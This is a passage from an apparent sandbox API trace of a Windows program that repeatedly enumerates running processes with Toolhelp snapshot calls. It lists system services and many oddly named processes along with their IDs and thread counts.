lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0155.002] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0155.004] CloseHandle (hObject=0xc4) returned 1 [0155.004] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.009] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0155.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0155.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0155.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0155.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0155.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0155.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0155.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0155.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0155.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0155.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0155.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.024] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0155.025] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0155.036] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0155.037] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0155.038] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0155.039] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0155.040] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0155.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0155.043] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0155.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0155.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0155.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0155.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0155.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0155.049] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0155.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0155.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0155.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0155.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0155.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0155.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0155.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0155.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0155.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0155.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0155.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0155.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0155.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0155.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0155.065] CloseHandle (hObject=0xbc) returned 1 [0155.065] Sleep (dwMilliseconds=0x12c) [0155.373] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.379] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0155.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0155.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0155.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0155.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0155.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0155.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0155.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0155.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0155.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0155.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0155.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0155.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0155.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0155.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0155.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0155.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires 